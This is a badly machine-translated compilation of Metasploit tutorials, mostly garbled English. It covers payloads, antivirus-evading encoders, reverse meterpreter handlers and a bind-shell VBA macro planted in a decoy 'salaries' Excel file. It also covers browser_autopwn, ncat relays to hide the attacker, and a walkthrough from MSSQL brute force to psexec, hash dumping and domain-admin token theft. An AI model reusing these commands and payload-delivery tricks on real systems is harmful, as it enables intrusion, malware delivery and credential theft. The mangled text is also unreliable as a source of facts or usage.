Spill tracking using the Metasploit Framework. Metasploit instructions from stagnation Metasploit kali instructions from stasis

We have written a lot of articles on evil and Wikoristanny Metasploit, including how not to lose traces, the development of the internal architecture of the site, as well as a lot of cheat sheets on commands and scripts.

With this helper we are starting a comprehensive series of articles for beginning and learning Metasploit. This is a very important part, but the basics will be briefly reviewed Metasploit- One of the most powerful hacker platforms on planet Earth.

How to install Metasploit

Metasploit- a project with an open source code, dismantled by the hacker HD Moore in 2003. Start of writings on Perl, but in 2007 the work was completely rewritten to Ruby. In 2009 the number of purchases was made Rapid7, a company that specializes in providing information security services, which also produces a spill scanner Nexpose.

Metasploit version 4.12 is already included in the distribution kit Kali Linux . In the same way BackTrack. If you are vikoristing another distribution Linux or else MaxOS, then you will have a chance to visit this site Rapid7.

What kind of vikorist are you? Windows, then you will also happen to be attracted Metasploit From the site Rapid7, but we do not recommend running it in Windows. You, of course, can do this with a lot of functions that we can see in this article, just don’t work there.

U Metasploit There are many versions, including Metasploit Pro(mostly commercial version) and Community Edition(Bezkoshtovna). The axis of the rest is just created in Kali. We are concentrating on Community Edition, since we think that most of you will not buy Pro version value of $30,000.

Metasploit Wikimedia Methods

Metasploit You can vikorist in a number of ways. The most advanced way that we can use all the time is through the interactive console. Metasploit. It is activated by entering msfconsole in the command row Kali. There are also a number of other methods.

Msfcli

After all, you can vicorista Metasploit h command line Kali or in mode msfcli. At first glance, it seems that when we are in the console, we are victorious in the command row. In fact, we have a vikoryst interactive console with special keywords and commands. When we do it msfcli, then it is actually a vikorist Linux command line.

To view information about all available commands msfcli, type at the console:

Kali > msfcli -h

Now, let Vikonati exploit msfcli type the command:

Kali > msfcli payload = rhost = lhost= E

De "E" - shorthand for "Execute" (viconati)

Our statistics have good results payload(korisnyh navantazheni) to protect against anti-virus programs, use the vikoryst command msfencodeі msfpayload in command row mode ( msfcli).

Not far from vikoristannya msfcli those who are not so kindly treated as msfconsole, and surrounded by a single shell, making it impossible to work with complex exploits.

Armitage

Do you want to become a vikorist? Metasploit with a graphical interface (GUI), there are a number of options. For example, Raphael Mudge Armitage(This is the name of the main character in the great original science fiction book about cyber hacking “Neuromancer”. It can be read by a skin hacker who deserves the genre SciFi).

Let's run it Armitage V Kali, just enter:

Kali > armitage

Yakshcho Armitage If you can’t connect, then try these other commands:

Kali > service start postgresql kali > service start metasploit kali > service stop metasploit

Armitage- this graphical interface on top of the Metasploit necessities on the client-server architecture. You launch Metasploit as a server, i Armitage becomes your client, giving you public access to function Metasploit for the help of a fully functional, albeit not intuitively intelligent GUI. What do you really need? GUI, to feel comfortable, then, kindly, vikorist Armitage. But being in a command line is a practical necessity for any hacker who respects himself.

Modules

U Metasploit There are six different modules:

  1. payloads
  2. exploits
  3. post
  4. nops
  5. auxiliary
  6. encoders

Payloads- This is the code that we are losing on the evil system. People call them listeners, rootkits, etc. U Metasploit The stinks are called payload (brown navantazhenny). Payloads enable command line utilities, Meterpreter etc. Payload You're booming different types for example, staged, inline, NoNX(bypass the “No Execute” function for active current processors), PassiveX(bypass firewall rules about outgoing traffic), IPv6 and others.

Exploits- this is a shellcode, which is a vicious influence and shortcomings in the system. This is a very specific code. For example, there are exploits for the operating system, service packs (SP), specific services, ports and add-ons. They can also be classified into types operating systems that's an exploit Windows don't work in Linux And by chance.

Post- These are the modules that can be used for post-exploitation attacks on the system (after access to the system has been denied).

Nops- Short version No OPerationS. For processors of the x86 family, it is indicated as hexadecimal 0x90. It simply means “don’t bother doing anything.” This may be of greater importance for buffer overflow attacks. We can look at the modules nops call for help show.

Msf>show nops

Auxiliary- includes a number of modules (695) that do not fit into one of the other categories. Before them there are such things as fusers, scanners, modules for DoS attacks (on VMware in service) and much more. For more detailed information, I refer you to our article about Auxiliary modules.

Encoders- These modules allow us to code our payloads in different ways in order to bypass anti-virus programs and other security systems. We can get these codes by typing:

Msf>show encoders

How are you talking, oh Metasploit I was forced to work on a lot of coders. One of our favorites - shikata_ga_nai. Vіn allows you to vikorist payload XOR what helps to deceive antivirus programs and other security systems.

Search

U Metasploit 4 the possibility of searching appeared. I had a chance to become a vikorist before msfcli that team grep to know the modules. Now Rapid7 adding searches for keywords and other features. Adding to the search was even more recent, fragments Metasploit I've grown up a lot, but now I'm looking for the questions grep There was no longer enough to know between more than 1400 exploits.

Searching for keywords allows you to either search for a simple search or search for more detailed searches. For example, we can determine the type of module that you need to know, vikori keyword type:

Msf > search type:exploit

Yakshcho mi tse zrobimo, then Metasploit Give us 1295 exploits. Not even korisny.

Ale we know we want to attack the car Sun Microsystems near Keruvannyam Solaris (Sun UNIX), then we can clarify our search and search only for exploitation Solaris. Why do we need to search for the keyword? platform.

Msf > search type:exploit platform:solaris

Now we heard our search for these few exploits that work against Solaris.

For further clarification, it is acceptable to search for what we want to attack Solaris RPC (sunrpc) And, obviously, we need to avoid exploits that attack this specific service. We add the keyword “ sunrpc" in our the sound signal is turned on, as shown below:

Msf > search type:exploit platform:solaris sunrpc

As you can see, here are the results of the search results for up to five exploit modules!

U Metasploit There are a lot of possibilities that we can continue to see in the upcoming articles Metasploit. Try some hacks for now Metasploit What is described in other posts on the site. Turn around! Vivchite Metasploit And start doing evil like a professional!

Vidmova's responsibility: This article was written only for illegitimate purposes. The author has never published this article for illegitimate purposes. If readers would like to quickly obtain information for their own benefit, then the author obviously does not bear responsibility for any mischief or mischief.

What is a metasploit?

Metasploit(and it’s correct to talk about metasploit as about a project) – the project itself is in the focus of computer security, directing information to stakeholders (especially government officials, specialists and administrators) and a pool of resources about possible spillages in the security system and helps testing of systems and measurements By closing the doors, they were safe and protected. To develop metaexploits, there is a special medium called Metasploit Framework. The rest turned into its own subproject, which is a software middleware and platform for developing and developing exploits on a remote machine. The nutritional vicor of the platform and the stagnation of the project as a whole will remain slimy, fragments of the middle, clicked before carrying out the final activity system administrators security measures are successfully exploited by hackers to develop and develop new exploits to deny unauthorized access to resources.

Metasploit Framework Since its launch in 2003, it has seen some changes, and it came to us with a highly expanded license for both cost-free and commercial versions. The options include a lot of ready-made exploits that will help you deal with identified problems. Runs seamlessly on Unix Windows systems, there are a number of interfaces to choose from, close to the browser window.

How to use the Metasploit Framework, or what is a metasploit? The main principles of the middle course.

Before work in the middle, it is absolutely necessary to collect as much information as possible about the computer, so you need to go through a whole set of steps, so you have to work on the choice of exploit and payload.

How to use the Metasploit Framework?

That axis is here:

https://www.metasploit.com/download/

Ale, don't rush. The platform also includes a wide range of system assemblies that can be widely distributed under a cost-free and free license. We are familiar with this on the blog page in the Linux section. Before the warehouse takes part in many experiments, it is absolutely safe to enter the middle.

Getting to know each other Shel.

It depends on the type of exploit, after which the exploit is integrated into life, we can see on the right or with a remote shell ( Remote shell) that meter-shell ( Meterpreter shell).

Added shellcomputer program From the command line (terminal), which you can enter commands on a remote computer, whatever you were behind your keyboard. This is the Desktop (as Windows is called). The standard shell becomes stagnant in cases where the hacker intends to install standard commands on the victim’s computer. However, we are talking about complex manipulations in the current session and the formation of commands with additional ensigns, which will be vicoristano shell Meterpreter.

Z meter-shell a little more. Meterpreter shell It is already introducing a whole bunch of ready-made software solutions. This includes utilities and scripts for collecting information on to a remote computer, tools for monitoring devices such as microphones and webcams, etc. And with the development of technology, there is an increased interest in ready-made solutions that are growing and being perfected, and more. And now a little more about the description of everything.

Look for the configuration of the exploit

I appreciate that you are already in Cali. We launch Metasploit and give the command to display the available exploits. Tse team

The terminal displays information about exploits in alphabetical order. Don’t forget it manually, the search can be clarified by ensigns for the search by:

  • Dictionary of Zagalnye tricks and unclosed holes in bezpets ( CVE ID). You can immediately enter the following:
search cve:2017

  • Microsoft Security Bulletin
search MS
  • right behind the bazhana program or virobnik PZ or I’ll add it
search Netgear

  • And, having selected the mark, retrieve from this drive all information about the spillage that was added before the spillage info(Messages for more information about this food will be at the same terminals). Take a look:

Everything there checks on your analysis and stagnation. Before that, how to go into the configuration of the exploit, let’s take a spill in the round with the command use

Or, turning to one of the front windows, reveal the following exploit until you have mastered it and freeze it:

And we can immediately verify how to confine him and to what extent to tie him up, vikoryist and ensign known to us info in the context of the exploit:


Exploit configuration: installed options

Our team will help us direct the metasploit into the right direction set . Team in msf I can see it in the future

Set name_change_value

To find out what changes there are for exploitation, you can use the command show options

Rozdil Module options known to us from the military service of the command with the ensign info, shows how the configuration can be set when choosing a device. Thus, the module immediately indicates those who use stagnation against spillage due to the stagnation of these mandatory options (ready to see the ensign before work). yes, what's on no you haven’t gotten around to it yet). To use the pentester for exploitation, use the following:

  • remote system addresses ( RHOST)
  • remote port 8080 ( RPORT)
  • as a meth detector ( TARGETURI) – path to stagnation in the system or path to the victim’s possession (for example, if a router is being attacked, here a new path is indicated at the visible address to the spilled file)

Let's finish the picture with a tan. Launching the exploit in our Wi-Fi pad will look something like this:

Exploit(netgear_nms_rce) use msf exploit(netgear_nms_rce) set RHOST 10.10.10.10 set RPORT 8080 set TARGETURI exploit -j

For taste, the commands described above are not required. More detailed information will be provided later.

Vibir and molding payload

Do we need access to someone else's computer, since we can't get anything there? And for this purpose you will need a payload. Just like a metasploit, a payload is that very part of a useless piece of software designed to replace the functionality of the system. At that time, as another part of the software can be directly based on additional functions (for example, copying and reproducing oneself; mova go about computer virus). As you can imagine, the payload can be divided into a single code and combined with different options.

Working in the middle of Metasploit, you can marvel at the ready-made payload options for a hundred selected exploits. Be shy as a team

Show payloads

the exploit option you selected. Another option is to write to the selected exploit

Set payload

and it is secured by pressing the key twice Tab. Metasploit asks you if you don’t want to look at all... Paylouds. І enable the Metasploit terminal to display information from payloads in the format Operating System/Shell TypeOperating system/Shell type. For example

Set payload/windows/shell_reverse_tcp

You will not be able to select the required OS and payload type that suits you. The most popular types of payloads are the same as the shells that we have talked about more often (removals and interpreters or meter-Shel).

The choice of payloads from the middleware cache is even wider. So just like choosing the cost, for additional help, the system of the victim is “poured” to the hacker required information. Typical shells with base reverse_tcp The commands are most important for this purpose: by signing on to a remote system, they inform the attacker of the data, often without raising suspicion on the system firewall.

Bye bye. Good luck

Having appeared in the world 7 years ago, MSF has transformed from a simple framework for writing working alloys into a kind of “Swiss knife”, and now into a whole mastermind of conducting pentests, including everything necessary - such as collecting information ї before the modification of post-exploitation methods. It is not for nothing that MSF can enter up to five of the most used tools. And why not – MSF will continue to grow and develop! And in any direct way - you know from this article.

Initially, the article was intended to describe the possibilities of automation of actions in MSF, but after analyzing the people’s knowledge about the framework, it was likely to be revealed about the more-minority of the possibilities of its own, and about its automation it will be said along the way. It's just that people shouldn't be riding bicycles :).

Before we talk, about knowledge. It is not surprising that there are not so many of them, since there are no comprehensive articles/books about Metasploit in English. So the main sources of information are foreign blogs and individual research. Plus, keep quiet, because Ruby is simple, and behind other people’s butts you can learn your own skills.
Bye bye! Everything described is futile remaining version- MSF 3.4.2.

GUI is turning around!

For those who don't like the console or are too lazy to understand the MSF commands, there is a go-to shell based on GTK. More precisely, I realized that the fragments with version 3.3 were killed. I have no mercy, the same thing happened with msfweb. It’s still possible to become selfish, otherwise there would be problems with stability, but here... eh!

But just before the hour of preparing the article, it was good – a new goose-bump. It has changed both in the middle and in the middle. To be more precise, it is written in Java, so it is cross-platform, and also interacts with MSF via the XMLRPC interface, so you can edit it remotely.

Launching the program takes place in two stages: starting with msfrpcd, connecting to the next one via msfgui. With msfgui running under your server, you can simply type “start new msfprcd”

Win version:

  1. Launching the Cygwin console
  2. cd /msf3
  3. msfrpcd -S -U username -P password de -S - SSL connection, and create a login/pass
  4. launch msfgui.jar, which is saved in %MSF%\msf3\data\gui either with a double click or in the console (not in cygwin): java –jar msfgui.jar

At msfgui, enter login/pass, port, IP and connect.

Something, it seems, is not growing in the old days. For example, access to the console or viewing logs. You can also do this, especially if you need to quickly navigate through plugins, modules, surf on someone else’s computer, etc.

Collection of information

You may be aware that MSF operates on a database to store information that is exchanged between its modules. And this is actively developing.

For the most part, the only database supported is PostgreSQL. While SQLite has benefited from productivity/scalability issues, MySQL has now gone smoothly. However, the Postgres installation is not to blame for problems. The driver for communication is built-in from MSF.

Under Win: set, set the pass for the client - postgres and port.

Via pgAdmin: we connect to the local server, create another user “Roles for Login” (msf_user), create a database in the “Base” (msf_db). There you can also configure the SQL server itself, having created it “safely”, and navigate through MSF tables.

msf> db_driver postgresql
msf> db_connect msf_user: [email protected]:5432/msf_db

Now the db_create command does not work indiscriminately, you can only connect to the original database, and, since you have privileges (like the postgres user), the database will be created automatically. Otherwise, create the database manually with Postgres.

But it’s not so scary, you can also use workspaces. There is one database, the tables themselves, but the modules exchange/add information to the flow space. If you try, you understand, db_workspace will help you.

Let's take a moment to figure out the commands:

  • db_service – displays information about ports/services scanned either by modules, or imported by nmap, or imported from third party programs. Based on this, db_autopwn works with the –p parameter (by ports);
  • db_notes – “notes”, type of OS version, extracted from Nmap, or “details”, extracted from WMap. It’s a pity, but db_autopwn seems to not be surprised at db_notes for choosing a sploit.
  • db_vulns – vulnerabilities found either by MSF modules (WMap), or by import from Nessus (OpenVAS), Nexpose. Based on this, db_autopwn is run with the -x parameter (for spillover).

For example, we scan the host with nmap and send the results to our database:

msf> db_nmap -PN -sV 192.168.0.101

The pouch for the port scanner module with MSF will be similar, and the data will also go to the database. The axis only for specific services requires the use of other modules (all aux-modules with version at the end in the scanner section, for example, scanner/imap/imap_verison).

msf> use scanner/portscan/tcp
msf> set RHOSTS 192.168.0.101
msf> set PORTS 1-1000
msf> run -j

To automate the rest of the story, you can quickly find so-called resource files in MSF. Essentially, these are the original text files with the latest reorganization of commands for MSF. For example, we create a resource for Swedish launch"server" for reverse meterpreter. For this purpose in the file (metrevhandl.rc) the following commands:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit -j
back

Let’s run our script using the additional “resource”:

msf> resource metrevhandl.rc

Yak bachish - very handy. That's not all. The best thing is that in these scripts you can write code in Rubi, which allows us, for example, to interoperate between adjacent MSF modules.

Before speaking, home/.msf3/msfconsole.rc is a script that is automatically launched when msfconsole starts. It’s really easy to block the connection from the database, for example.

Let's go...

WMAP. WMAP is an attempt to adapt MSF to web programs and to automate everything on the right. The WMAP project is still in its early stages and is not performing well, especially compared to its competitors. It is unlikely that they will develop, at least in their own way, and the reason is that Rapid7 has begun to heavily fund the open-source w3af framework, which is dedicated to the web, so you can Troschev and the functionality of MSF and w3af. But still a small butt (requires connection to the database):

1. We recommend the wmap plugin:

msf> load db_wmap

2. Adding a victim:

msf> wmap_targets -a http://www.example.com/

3. A look at the launch of modules against our victim:

msf> wmap_run -t
msf> wmap_run –e

The bags are stored in the database and are accessible through db_vulns, db_notes.

Some modules will require adjustment of parameters. You can use the setg command for help. WMAP also has a crawler (wmap_crawler) and the ability to interact with a proxy (wmap_proxy).

Also, for those who like to torture databases with different injections, I recommend checking out the MSF module - scanner/http/sqlmap. The single-name tool port is SQLmap. Rich, by the way, is strong :). Information about tools can be found on the creators' website -.

db_autopwn

Automatic parking in MSF has acquired a couple of basic parameters:

  • -R – specifies the minimum rank for the exploit that is available;
  • -m – set the regexp to the selection of rafts.

For example:

msf> db_autopwn -t -p -m windows -R excellent

You will see a list of the shortest connections for standard Win-services.

Before speech, from version 3.3.1, Nexpose can be processed directly from MFS and automatically updated based on detected problems.

1. We support the plugin and connect to Nexpose:

msf> load next
msf> nexpose_connect msf_user: [email protected]

2. We are launching only the shortest networks for spill detections:

msf> nexpose_scan -R excellent -x 192.168.0.101

Browser_autopwn

Since the front page was designed for standard layers, this one is for clients, targeting the browsers of victims, which is clear from the name.
Essentially, this module raises the HTTP server and then raises all connections for browsers. When a victim logs into our server, the module detects the browser version and OS, after which it launches the third party. For now, the main feature of the module is the exact browser/OS version. Vikorist both server and client capabilities (JavaScript) by detection. It’s definitely not possible to fool the module by introducing a different User-Agent.

There are obvious alloys available in old-school versions of browsers, but the best thing is that you can simply add your own alloys, and that’s the power. No cost ploypack to come out.

In future versions, it is expected that there will be additional possibilities for obfuscation of alloys (so that they are not scorched by antiviruses) and the ability to choose vantage.

For example, let’s create a server with backconnect for shells 192.168.0.102:

msf> use server/browser_autopwn
msf> set LHOST 192.168.0.102
msf> set URI index.php
msf> exploit -j

VBA

In the EasyHack section, I already wrote about creating Trojans using MSF, or sending exe files - which is even worse. The rusty ones have become fluffy and do not open everything that has been worn out, and there is also a pre-growth from the wind. Where is the best place to put all your office files:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

Next, we create, for example, an Excel document with the terrible names “Salaries of conscripts.” Then we open the VBA excerpts, the text of the macro (MACRO CODE) is written into the document macro (Tools -> Macro -> VB Editor), and, for example, the document is our “obsession” (PAYLOAD DATA). You can add any kind of coloring to the document head. Some of the macros are enabled by default (from the OfficeXP version, as far as I know), then next to the form “Respect! Working with the base is only possible with the inclusion of macros. To turn them off, go to “Tools –> Options –> Security –> Macro Protection –> Low” and restart the document,” you can enable the user to enable macros. The result is a shell on port 5555.

Sensove navantazhennya

The choice of payload to the right is important. But MSF has a lot of them, so I’ll go through them a little (mostly Win*) so that a deeper understanding emerges. First of all, there is a subsection on the AXES, as well as the PZ itself and the interpreters who are interested in (ruby, perl).

The hidden hem behind the description:

  • With the “Inline” icon – there are “whole” codes. The stench is great, so you won’t have to resort to exploits again;
  • "Stager" - vantagement, division into parts. The sploit has a small seam, mainly for installation, the joint is adjusted when connected;
  • "Ord" - "imprisoned" navantazhenya. Small in size, but tied to a static address in the memory of the system DLL;
  • “Bind” – opens the port and opens the connection;
  • "Reverse" - backconnect shell;
  • “Findport” – a search was made for the socket, through which exploit it was running, and then it was opened through a new one. Search for the port number;
  • “Findtag” - similar to the first one, the only one assigned to the socket is to listen for all available 4-byte tags from the hacker.;
  • “Exec, Download_exec, Up_exec” – command launch command, download/download and launch;
  • "VNC" - launches the victim's VNC server;
  • “dllinjection” – enhancement of DLL in process memory. DLL injection has two types;
  • "metsvc" - completely attracts the victim's meterpreter and registers it as a service;
  • "PassiveX" - our shell acts as an ActiveX element.
  • "NoNX" - silkcode bypassing the DEP memory protection mechanism;
  • "DNS" - those that can be processed by host names, and not by IP;
  • “HTTPS” is a shell that follows the encrypted HTTPS protocol (of course, without proxy support).

I’m a little bit stuck on PassiveX, because the stench is so bad.
The bottom line is that our shell is registered as an ActiveX element, and interaction is carried out through a proprietary version of IE using the HTTP protocol. It’s really cool, especially since you’re running a corporate network, but everything is behind NAT and a hidden firewall that only allows HTTP traffic from the corporate proxy server. In this case, there is no other way to help, especially if you don’t know how to configure the proxy. And here - all the setup for proxy and authentication on the new one (as it is) is already registered in IE.

It is possible to view and listen to it (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Moreover, since PassiveX previously only worked under IE6, now everything is ok under IE7/8.

Let's talk about the original shells. The initial shell is, firstly, good, if you used meterpreter, then you will want to turn around.
And now we have such a possibility. Let’s say our victim (192.168.0.101) already has a primary bind shell on port 5678.

Connect to new MSF:

msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

I would like to say that with an offensive command we recreate the primary shell on meterpreter, but not the same. MSF simply expands the meterpreter backconnect and, having launched it, creates another session (another connection is created). I want it to be bad. For everything to work, we need to set the global values ​​of our host (where the reverse connects), and then “new” the session (for example, we have “1”):

msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions –u 1

As a result, the voltage and voltage of the primary shell are eliminated.

Before we talk about meterpreter. They have been trying to transfer it to other platforms (linux, Macos) for a long time, but not everything is going smoothly there yet. Anyway, there are good news: as I see it, meterpreter is porting to PHP! I think that not all functions can be implemented by PHP, but most of them are already available. So you can fill up the ruined server and calm down with such a cool shell.

Now let's talk about safety precautions. While most MSF modules do not support proxies, combat pressure is especially challenging. Aje mi don’t want it, just let us be virahuvali :). So we come up with an old-school feature - portforwarding.

Let’s say our server with MSF, which checks for backconnect shells, is located at the address “192.168.0.103:5555”. Then on a fake server on port 80 we connect to netcat:

ncat --sh-exec “ncat 192.168.0.103 5555” –l 80 --keep-open

And in payloads we register the IP (or DNS) and port of the fake server.
Before speaking, netcat supports SSL, which allows you to encrypt traffic that the shell itself does not allow.

Post-exploitation

So, now let's move on to the most delicious part - post-exploitation and meterpreter. I bet you are familiar with the meterpreter, so you can tell how good it is (and after that it doesn’t deprive itself, and works in chroot) and functional (hack-tools installed, modification of the estru ta file system, migration by processes and tokens, routing) I have no problem :).

It is possible that we have been denied access to one of the computers (192.168.146.129) in the corporate network and we (192.168.0.102) want to expand our success - scan the subscriber and so on.

Add a route (subnet, mask, session for routing) in msfconsol:

msf> route add 192.168.146.0 255.255.255.0 1

It’s a pity that nmap didn’t want to take this route quickly – perhaps the integration isn’t that deep yet. You can calmly (without any special settings) use basic modules, layers and scanners to develop an attack (amazing little ones) - MSF takes over all the routing.

Since the existing hosts may have access to the external network (as we know), then to communicate with them you can use portforwarding on an already spent victim, fortunately, meterpreter means:

meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

Now we will write in the payloads of the alliances LHOST=192.168.146.129, LPORT=8008, and everything will be top-notch.

Meterpreter has amazing power - automation of actions with the help of ruby ​​scripts. This is really cool. You can see other scripts in msf3scriptsmeterpreter, under the hour of use - write run and two tabs (for those who are not in the topic:). You can run scripts either manually via the run command, or by entering the AutoRunScript or InitialAutoRunScript changes during the configuration of the server/server. Another change is made before the shell is launched, the first change is made after.

There are already a lot of scripts included in the installation, from the most standard ones:

  • winenum - quickly collects all information about the system from the network to the installed software and hashes;
  • persistence, metsvc – registers meterpreter for autostart in the registry as a service;
  • getcountermeasure – turns on the fire, you can kill the processes of various antiviruses and firewalls.

Replacement

In the article, I tried to describe it in a new way (common for Russian dzherel) and in all stages of evil, so I bet it will turn out to be good for you. In addition, a couple of brilliant ideas were born that were never implemented, and a number of strange bugs were discovered in MFS, which, I suspect, will be fixed before the issue comes out. To create with zagalom is wonderful!

Tips:

  • msfconsol automatically performs auto-completion by pressing Tab, and all commands support the help parameter "-h".
  • If you want to zoom out to the background command – Ctrl+C, go to background – Ctrl+Z.
  • To copy text in cygwin, use the left/right mouse button, paste – Shift+Insert.
  • Under Windows, you have access to the msfcli, msfpayload, etc. interfaces. This can be done via the cygwin console. It is important to test it carefully, since not all functions can function adequately.

A practical guide to the Kali Linux distribution for auditing IB and conducting pen tests. Today I have great respect for one of the tools included in this distribution. Metasploit Framework . Take a look at the history of the project, and we will provide specific references and documentation that will facilitate the practical development of the package. Metasploit

History of the project

In 2003, a hacker known as "HD Moore" , the idea came to mind to develop a tool for quick writing and exploitation. Thus, a project known to all stakes was born Metasploit project .

The first version of the framework was written in my own Perl, which replaced the pseudo-graphic interface with the curses library. At that time, it was simply a collection of disparate exploits and scripts, secret information about them was stored in a single database. Information about the necessary precision to run scripts was usually available daily. They also carried a bunch of outdated code, required modifications of strictly prescribed solutions for a specific skin condition, which complicated the work process and complicated the development of new tools.

When working on another (2.x) version before HD Moore Matt Miller There are just a few volunteers. The third version was completely rewritten in Ruby, and was developed by Metasploit LLC (founded by the same developers in 2006). Via river 2008 license Metasploit Framework was changed from proprietary to BSD. And even later in 2009, the company Rapid7, which deals with spill management, announced the addition Metasploit dedicated software package for conducting penetration tests. It was also announced that the non-commercial version of the utility, as before, will be available to everyone.

Since the arrival of the framework, a lot has changed.

PRO and Community versions appeared, and in 2010, a simplified version was released for “low-skilled” accountants - Metasploit Express .

Versions

Today Metasploit is expanded in four versions:

  • Framework – basic version with console interface;
  • Community- no cost version This includes a web interface and some of the functionality of the commercial versions;
  • Express - for commercial clients, includes functionality that allows you to easily carry out basic audits and generate reports from them;
  • Pro - the most advanced version, provides increased capabilities for carrying out attacks, allows you to formulate instructions for auditing, create reports and much more.
In addition to the web interface available in the Community, Express and Pro versions, there are projects such as Armitage and Cobalt strike that provide a friendly and intuitive GUI interface for the framework.

Armitage graphic shell

In line with other interfaces Armitage allows you to visually identify all stages of an attack, including: scanning the nodes of the network, analyzing the theft of resources, detecting exploits and taking full control over the attack system.

All functions of the program are structured and accessible from the menu and program tabs, so you can get started with computer security. The program is intended for wikis on Linux and Windows platforms. Present on the retailer's website Weekend codes, dovidkov's companions in text and video format.

Basic understanding

1. Database

Before starting to work with the package, you need to access the ability of the database to save information about hosts, services, problems, etc. Connecting to the base is not much of a burden on the brain for the functioning of the framework, but it also contributes to increased productivity.

Metasploit If you use PostgreSQL, you will need to install a DBMS on your system before you can use it. Then reconvert what is running required services DB and framework.

2. Framework structure

“Heart” Metasploit – Rex library. It is required for operations of general significance: operations with sockets, protocols, text formatting, operations with coding, and the like. The library is based on it MSF Core , which provides the basic functionality of the “low-level” API. This vikoryst library MSF Base, which, in its turn, provides an API for plugins, a koristuvach interface (both console and graphical), as well as modules that are connected .

All modules are divided into several types, depending on the functionality that is expected:

  • Exploit- code that operates the song flow on the entire system (for example, stack refilling)
  • Payload- the code that runs on the target system after the exploit is executed (installs the connection, launches the shell script, etc.)
  • Post- code that runs on the system after successful penetration (for example, collects passwords, encrypts files)
  • Encoder- Tools for obfuscation of modules using masking method against antiviruses
  • NOP- NOP generators. This is an assembler instruction so as not to interfere with everyday operations. Vikorist to store empty items in vicon files for adjustment to the required size

    Auxiliary- modules for boundary scanning, traffic analysis, etc.

3. MSFCONSOLE commands

Regardless of the availability of graphical interfaces, the most common way to work with Metasploit, as before, is to remove the console interface. msfconsole .

Let's take a look at the main commands:

  • use- Vibrati singing module for robots with it;
  • back- operation, reverse use: start working with the selected module and turn back;
  • show- Display a list of modules of the singing type;
  • set- Set the meaning of the song object;
  • run- launch the additional module after installing the necessary options;
  • info- display information about the module;
  • search- Know the singing module;
  • check- check whether it is suitable for the entire bottling system;
  • sessions- Display a list of available sessions.

Can be used as a tool for penetration testing (security audit of IT infrastructure), consisting of faceless utilities that create a platform for implementing a wide range of attacks. I’ll show you a couple of Metasploit applications that can be used as a pentest algorithm. In this case, I will use a metasploit to show its strength and flexibility. As a platform for attacks on Vikorist Backtrack 5 R2, as the installation of the metasploit itself. So it is very important to note that the postgresql DBMS operates there as it accepts connections. Measurement for testing scenarios – 192.168.3.0/24.
Let's get started;)

1. Open msfconsole and check the status of the database.

Okay, let's talk about workspaces, which are used by metasploiters as logical units of information. You can use different workspaces for different pentests or different locations for pentests. In this way, it is easy to import/export data between different workspaces.

In one workspace, a number of data tables are saved, for example hosts, services, vulns, loot and notes.
You can add information to this table manually, for example, adding a host table.


You can also add a service to the services table.


To fill this table, you can automatically use db_nmap. You can also use any (your favorite, for example) scanning utility, export the results of its work to an XML file, and then import it into Metasploit. You can do this by selecting db_import in the middle of the metasploit menu (a variety of response formats, as metasploit understands – below).


Let's scan with nmap.

Let's see what hosts are located in the hosts table after this.


In the services table, you can filter out items that are unnecessary for us.

There are a lot of Windows machines that use the auxiliary module, which scans the smb version.


Select one of the hosts using the set command. Ale mi srobimo host one by one, so handily work for the additional base. We add hosts from the service database with port 445 to the file.


After scanning, you will see the services table.

We can host Windows 2003, one host with Windows 2003 service pack 1. Most host names and domain names are “TEST”.
Resolved information (I assume this is the case with hostnames):
TEST-EMEA-DC-01 - domain controller
TEST-EMEA-DB-01 - database server

Okay, let’s work with a potential database server.

Assuming that the MSSQL DBMS is installed there (since Windows is...), it works on port 1433, which is included in the list. “I’ll shoot it blindly” and try to run a test for the MSSQL DBMS.


Looks like it worked.

Good. Let's create the mssql instance. Run on port 1043, SQLEXPRESS. The current version is 9.00.4035.00, a build that represents Microsoft SQL 2005 SP3. Looking at the services table, what has changed there?

I got it: port 1043 is mssql and UDP port 1433. This is the port that mssql is really used for.
Now we know that the database service runs on this port and we can organize a brute force attack, vikory attack, and the same metasploit.

Please indicate the correct number of the remote port (the DBMS listens to us on port 1043), the username and password.

Let's launch and successfully find the password.

OK. This is the password and this is our guy’s credential. The creds table has a lot to offer.


Time to create an exploit.


We know the name of the client, the password and the port.


Let's remove the meterpreter shell.

Let's report on this session. Go back to the list of sessions, we will add 1 session there.


Next, I will show you the history of various modules that occur after operating the system.

Using smart _hashdump, you can verify hashes. I will install the SESSIONS and GETSYSTEM parameters.

I'm launching.


There may be an update for the loot table.
I removed the privileges of SYSTEM and 2 hashes. It appears that there is a valid administrator account (the “localadmin” account has a RID of 500).

Let's look at the loot table.

The table has 3 flavors.

I’ll check that this password is used by the administrator in other systems. All that I need for this purpose, I may.

I’ll add a list of hosts from the services table (we saved this earlier).


We won’t let Lamati hash (but will we?) just marvel. Set the parameters BLANK_PASSWORDS and USER_AS_PASS to the value "nonsense".

There are a lot of other inputs after launch. Vinovok - the administrator has one password for a number of machines at the edge.

A few more credentials have been found.


I took off local passwords to different Windows systems. Maybe vikorystvati exploit
psexec, otherwise you might end up going through all the hosts one by one manually, but that’s not possible.
In exploits, you need to set the parameter - RHOST, not RHOSTS, and therefore you cannot set a list of hosts to look for spills.
I’ll show you how you can automate this process using additional scripts.

From various sources on the Internet this script has been leaked. You can easily change it and add functionality.

I started running psexec.
However, I can’t run this entire script, because... here vikoristasya korisne navantazhennya (payload) windows/meterpreter/reverse_tcp
This is where the problem lies - the port, which I hear, cannot but be true. That's why vikorist payload windows/meterpreter/bind_tcp.

I'll launch my script.

The 9th session and cloud account of localadmin are protected.

We are still looking for hashes, now we will do it traditionally manually, interacting with the skin session and dumping hashes.
Alternatively, you can use the credential collector module. This module will give us hashes and (which is important!) incognito and look functions for token domains. Unfortunately, the module requires you to manually launch yourself, step by step, for each skin session, since, of course, there is no corresponding file, so stinks are saved.


I start collecting hashes and tokens.

Sessions 5 and 6 produce valid domain tokens.

Try to steal a domain and voila - we have access to the same domain admin.

